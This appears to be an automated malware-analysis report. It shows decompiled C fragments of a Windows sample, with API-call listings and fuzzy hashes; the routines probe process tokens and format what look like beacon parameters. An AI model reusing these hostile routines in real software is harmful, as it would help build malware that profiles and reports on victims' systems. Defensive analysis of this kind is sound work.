                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpymemset
                                                          • String ID: %]^
                                                          • API String ID: 4042389641-1107362547
                                                          • Opcode ID: 3568d2a47b063e26d9ab2bcd4a10b206a38564d5166cd75a7879bb878b83fdea
                                                          • Instruction ID: ed0662d0abe584a77865cfd9ad01e09f83a7cbd13f645e4e9dd38134129a103e
                                                          • Opcode Fuzzy Hash: 3568d2a47b063e26d9ab2bcd4a10b206a38564d5166cd75a7879bb878b83fdea
                                                          • Instruction Fuzzy Hash: 26E065B79053A267D634AABA5CCDD4F2EEDEBD43A4B100925FE8697101F520CC14C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005E1B42() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x5ed26c; // 0x270
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff;
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);
                                                          					_t5 =  *0x5ed2bc; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				_t6 =  *0x5ed26c; // 0x270
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x5ed238; // 0x1270000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}

                                                          APIs
                                                          • SetEvent.KERNEL32(00000270,00000001,005E4F0E), ref: 005E1B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 005E1B5C
                                                          • CloseHandle.KERNEL32(00000270), ref: 005E1B7D
                                                          • HeapDestroy.KERNEL32(01270000), ref: 005E1B8D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 75e05bf0947af8b61ad6c72aad6d403eae18b183b222dba0bb6931e63721b515
                                                          • Instruction ID: 1988293ef950d185c0508a455928b6d81ee689ceacf7b33e1076bfb34aa8ff10
                                                          • Opcode Fuzzy Hash: 75e05bf0947af8b61ad6c72aad6d403eae18b183b222dba0bb6931e63721b515
                                                          • Instruction Fuzzy Hash: 60F08C35A0178187DB189B3AEC8CE0A3FACBB247607040210F995DB2A0EB31C849A660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E005E23F4(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t11;
                                                          				void* _t12;
                                                          				void** _t14;
                                                          
                                                          				_t14 = __esi;
                                                          				_t4 =  *0x5ed32c; // 0x16695b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x5ed32c; // 0x16695b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t14;
                                                          				if(_t8 != 0 && _t8 != 0x5ed030) {
                                                          					HeapFree( *0x5ed238, 0, _t8);
                                                          				}
                                                          				_t14[1] = E005E486F(_v0, _t14);
                                                          				_t11 =  *0x5ed32c; // 0x16695b0
                                                          				_t12 = _t11 + 0x40;
                                                          				__imp__(_t12);
                                                          				return _t12;
                                                          			}

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(01669570), ref: 005E23FD
                                                          • Sleep.KERNEL32(0000000A,?,005E5D25), ref: 005E2407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,005E5D25), ref: 005E242F
                                                          • RtlLeaveCriticalSection.NTDLL(01669570), ref: 005E244B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 6f90c66823e95827675e2bc06bb75a570e09cba59724bd6e09c2c0c4ed4e1b97
                                                          • Instruction ID: c32e33ac2a6ba23477583d5a63593a7c744d24b8d685b3e6383a07989273e1fd
                                                          • Opcode Fuzzy Hash: 6f90c66823e95827675e2bc06bb75a570e09cba59724bd6e09c2c0c4ed4e1b97
                                                          • Instruction Fuzzy Hash: 0BF0DA716002C1DBDB1CDF6ADD8CF197BF8BB28740F048404F9C1CA2A5C720E849EA26
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E005E6702() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x5ed32c; // 0x16695b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x5ed32c; // 0x16695b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x5ed32c; // 0x16695b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x5ee81a) {
                                                          					HeapFree( *0x5ed238, 0, _t10);
                                                          					_t7 =  *0x5ed32c; // 0x16695b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}










                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(01669570), ref: 005E670B
                                                          • Sleep.KERNEL32(0000000A,?,005E5D25), ref: 005E6715
                                                          • HeapFree.KERNEL32(00000000,?,?,005E5D25), ref: 005E6743
                                                          • RtlLeaveCriticalSection.NTDLL(01669570), ref: 005E6758
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 6f0dcb449c5f659a7178d822b279effbdcabb068dc7aa8dda3aa8228a7b3e216
                                                          • Instruction ID: 665176b299be837d80a4ce672cec2b97862c661100b8e2a91560732035901657
                                                          • Opcode Fuzzy Hash: 6f0dcb449c5f659a7178d822b279effbdcabb068dc7aa8dda3aa8228a7b3e216
                                                          • Instruction Fuzzy Hash: 1EF0B274600280DBEB1CCB65DDDDA197BF5EB28794B049459F982CF270C630EC09EA21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E005EA446(void* __ecx, char _a4) {
                                                          				char _v8;
                                                          				char _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				long _v24;
                                                          				intOrPtr _v28;
                                                          				char _v32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t47;
                                                          				void* _t51;
                                                          				void* _t53;
                                                          
                                                          				_t51 = __ecx;
                                                          				_v8 = 0;
                                                          				_v16 = 0;
                                                          				_v12 = 0;
                                                          				_v24 = 0;
                                                          				_t53 =  *0x5ed0a8(0x80000003, 0, 0, 0x20019,  &_v32);
                                                          				if(_t53 != 0) {
                                                          					L18:
                                                          					return _t53;
                                                          				}
                                                          				_t53 = 8;
                                                          				_t35 = E005EA71F(0x104);
                                                          				_v28 = _t35;
                                                          				if(_t35 == 0) {
                                                          					L17:
                                                          					 *0x5ed0cc(_v32);
                                                          					goto L18;
                                                          				}
                                                          				_v20 = 0x104;
                                                          				do {
                                                          					_v16 = _v20;
                                                          					_t10 =  &_v12; // 0x5e3741
                                                          					_v12 = 0x104;
                                                          					_t53 =  *0x5ed0d8(_v32, _v8, _v28, _t10, 0, 0, 0, 0);
                                                          					if(_t53 != 0xea) {
                                                          						if(_t53 != 0) {
                                                          							L14:
                                                          							if(_t53 == 0x103) {
                                                          								_t53 = 0;
                                                          							}
                                                          							L16:
                                                          							E005EA734(_v28);
                                                          							goto L17;
                                                          						}
                                                          						_t24 =  &_a4; // 0x5e3741
                                                          						_t53 = E005E853F(_t51, _v32, _v28, _v24, _v12,  &_v8,  *_t24);
                                                          						if(_t53 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					if(_v12 <= 0x104) {
                                                          						if(_v16 <= _v20) {
                                                          							goto L16;
                                                          						}
                                                          						E005EA734(_v24);
                                                          						_v20 = _v16;
                                                          						_t47 = E005EA71F(_v16);
                                                          						_v24 = _t47;
                                                          						if(_t47 != 0) {
                                                          							L6:
                                                          							_t53 = 0;
                                                          							goto L12;
                                                          						}
                                                          						_t53 = 8;
                                                          						goto L16;
                                                          					}
                                                          					_v8 = _v8 + 1;
                                                          					goto L6;
                                                          					L12:
                                                          				} while (WaitForSingleObject( *0x5ed26c, 0) == 0x102);
                                                          				goto L16;
                                                          			}















                                                          APIs
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • WaitForSingleObject.KERNEL32(00000000,00000001,?,?,?,00000000,A7^,?,?,?,?,?,005E3741,?), ref: 005EA520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeapObjectSingleWait
                                                          • String ID: A7^$A7^
                                                          • API String ID: 3050739573-2744181845
                                                          • Opcode ID: 70439558862aefff0ae20d3dc063ee0f24a4d01c51c884ef16612996643b6c15
                                                          • Instruction ID: e4dfa3bd0770d1864eeb2c7ac988e9b85e29b2c374e12c2c7a09338be49b7c54
                                                          • Opcode Fuzzy Hash: 70439558862aefff0ae20d3dc063ee0f24a4d01c51c884ef16612996643b6c15
                                                          • Instruction Fuzzy Hash: BE318B72C00259EBCF25ABB6EC888EEFEB9FF94710F204426E591B6150D2701E44DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E005E729A(void* __eax, char _a4) {
                                                          
                                                          				 *0x5ed2b4 =  *0x5ed2b4 & 0x00000000;
                                                          				_push(0);
                                                          				_push("xhF");
                                                          				_push(1);
                                                          				_t1 =  &_a4; // 0x4d283a53
                                                          				_push( *_t1);
                                                          				 *0x5ed2ac = 0xc;
                                                          				L005E8D0E();
                                                          				return __eax;
                                                          			}




                                                          APIs
                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001,xhF,00000000), ref: 005E72B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: DescriptorSecurity$ConvertString
                                                          • String ID: S:(M$xhF
                                                          • API String ID: 3907675253-3190673016
                                                          • Opcode ID: a233bcebd0b06ea6c24b851813832b049d08722f70796601ee78a8d2df2a88be
                                                          • Instruction ID: 73a6fb7d7099be98fe7d85a5ec4a8e00d9ce2a69fc7b8c0c0f2da5bbc3042b09
                                                          • Opcode Fuzzy Hash: a233bcebd0b06ea6c24b851813832b049d08722f70796601ee78a8d2df2a88be
                                                          • Instruction Fuzzy Hash: E9C04C7D545381AAE6299F019D86F157A76B760B05F504404B784281D0C7F69018AA39
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E005E5AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E005EA71F(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E005EA71F(_t28);
                                                          					if(_t30 == 0) {
                                                          						E005EA734(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E005EA782(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E005EA782(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?,?,00000000), ref: 005E5AFD
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                            • Part of subcall function 005EA782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,005E5B2B,00000000,00000001,00000001,?,?,005E3E08,?,?,?,?,00000102), ref: 005EA790
                                                            • Part of subcall function 005EA782: StrChrA.SHLWAPI(?,0000003F,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?,?,00000000,00000000), ref: 005EA79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?), ref: 005E5B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E5B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E5B77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 75cfe1dc71985afb455045529a7e0cb4132d4839c43d3bff687078b73bab15d5
                                                          • Instruction ID: 9afcd8491b800b7439d695dbf21cfa00ce43140c629de7853354df4cd79ef969
                                                          • Opcode Fuzzy Hash: 75cfe1dc71985afb455045529a7e0cb4132d4839c43d3bff687078b73bab15d5
                                                          • Instruction Fuzzy Hash: CF21F376400296EBCB1AAF76CC88A9E7FBDFF56384B144050F9869F201E730D90087E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005E45C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E005EA71F(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}









                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0166935C,?,005E8D93,004F0053,0166935C,?,?,?,?,?,?,005E523E), ref: 005E45D6
                                                          • lstrlenW.KERNEL32(005E8D93,?,005E8D93,004F0053,0166935C,?,?,?,?,?,?,005E523E), ref: 005E45DD
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,005E8D93,004F0053,0166935C,?,?,?,?,?,?,005E523E), ref: 005E45FD
                                                          • memcpy.NTDLL(74B069A0,005E8D93,00000002,00000000,004F0053,74B069A0,?,?,005E8D93,004F0053,0166935C), ref: 005E4610
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 8eca6dde3862bd89a5aede92cfb69ff01c33e6b1b50a431c8e4553409cf2339c
                                                          • Instruction ID: fcfd69caa4351d7e82723d9e6011738f90fe0701f03e1eed509aeaf73a9d7f8a
                                                          • Opcode Fuzzy Hash: 8eca6dde3862bd89a5aede92cfb69ff01c33e6b1b50a431c8e4553409cf2339c
                                                          • Instruction Fuzzy Hash: 36F04976900119BBCF15EFA9CC89C8F7FACEF493947114062FA08D7202E731EA149BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(01669A78,00000000,00000000,7742C740,005E20ED,00000000), ref: 005E362A
                                                          • lstrlen.KERNEL32(?), ref: 005E3632
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • lstrcpy.KERNEL32(00000000,01669A78), ref: 005E3646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 005E3651
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 9f246d461adaf4514cb0917dfd0fa3d8253c62feb032a527f2e28114bd9e391e
                                                          • Instruction ID: eaf3e03c324597457680a80c0e1d7163ead9b982ad7730703ec05be86e67c7e8
                                                          • Opcode Fuzzy Hash: 9f246d461adaf4514cb0917dfd0fa3d8253c62feb032a527f2e28114bd9e391e
                                                          • Instruction Fuzzy Hash: 6AE09B73501261A74715ABE55C8CC5FBFBDFF997517040417F780D7110C721D90697A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 38%
                                                          			E047F5A27(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E047FA71F(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E047FA734(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}




















                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 047F5A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 047F5A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047F5A9D
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047F5ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 047F5AC7
                                                          • NtClose.NTDLL(?), ref: 047F5AD9
                                                          • NtClose.NTDLL(00000000), ref: 047F5AE3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 5a843bb359871757a8973da8da85876174df965d5e0e403da48b92f01a821aca
                                                          • Instruction ID: b5fff42e377b19be81435a7d0406d2479bbc69c2d17ab4475e767052e6d8f3dd
                                                          • Opcode Fuzzy Hash: 5a843bb359871757a8973da8da85876174df965d5e0e403da48b92f01a821aca
                                                          • Instruction Fuzzy Hash: 6921E3B290021CBFDB11AF95CC85EDEBFBDFB08750F108026FA05E6210D7759A559BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E047F4AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t59;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t63;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				int _t71;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t78;
                                                          				intOrPtr _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t88;
                                                          				void* _t94;
                                                          				intOrPtr _t100;
                                                          				signed int _t104;
                                                          				char** _t106;
                                                          				int _t109;
                                                          				signed int _t111;
                                                          				intOrPtr* _t112;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr* _t116;
                                                          				intOrPtr* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t126;
                                                          				int _t130;
                                                          				CHAR* _t132;
                                                          				intOrPtr _t133;
                                                          				void* _t134;
                                                          				void* _t143;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t146;
                                                          				void* _t148;
                                                          				long _t152;
                                                          				intOrPtr* _t153;
                                                          				intOrPtr* _t154;
                                                          				intOrPtr* _t157;
                                                          				void* _t158;
                                                          				void* _t160;
                                                          
                                                          				_t143 = __edx;
                                                          				_t134 = __ecx;
                                                          				_t59 = __eax;
                                                          				_v12 = 8;
                                                          				if(__eax == 0) {
                                                          					_t59 = GetTickCount();
                                                          				}
                                                          				_t60 =  *0x47fd018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t61 =  *0x47fd014; // 0x3a87c8cd
                                                          				_t132 = _a16;
                                                          				asm("bswap eax");
                                                          				_t62 =  *0x47fd010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t63 = E047FD00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t64 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t3 = _t64 + 0x47fe633; // 0x74666f73
                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x47fd02c,  *0x47fd004, _t59);
                                                          				_t67 = E047F56CD();
                                                          				_t68 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t4 = _t68 + 0x47fe673; // 0x74707526
                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                          				_t160 = _t158 + 0x38;
                                                          				_t145 = _t144 + _t71; // executed
                                                          				_t72 = E047F58DB(_t134); // executed
                                                          				_t133 = __imp__;
                                                          				_v8 = _t72;
                                                          				if(_t72 != 0) {
                                                          					_t126 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t7 = _t126 + 0x47fe8d4; // 0x736e6426
                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                          					_t160 = _t160 + 0xc;
                                                          					_t145 = _t145 + _t130;
                                                          					HeapFree( *0x47fd238, 0, _v8);
                                                          				}
                                                          				_t73 = E047FA199();
                                                          				_v8 = _t73;
                                                          				if(_t73 != 0) {
                                                          					_t121 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t11 = _t121 + 0x47fe8dc; // 0x6f687726
                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                          					_t160 = _t160 + 0xc;
                                                          					HeapFree( *0x47fd238, 0, _v8);
                                                          				}
                                                          				_t146 =  *0x47fd32c; // 0x52e95b0
                                                          				_t75 = E047F4622(0x47fd00a, _t146 + 4);
                                                          				_t152 = 0;
                                                          				_v20 = _t75;
                                                          				if(_t75 == 0) {
                                                          					L26:
                                                          					RtlFreeHeap( *0x47fd238, _t152, _a16); // executed
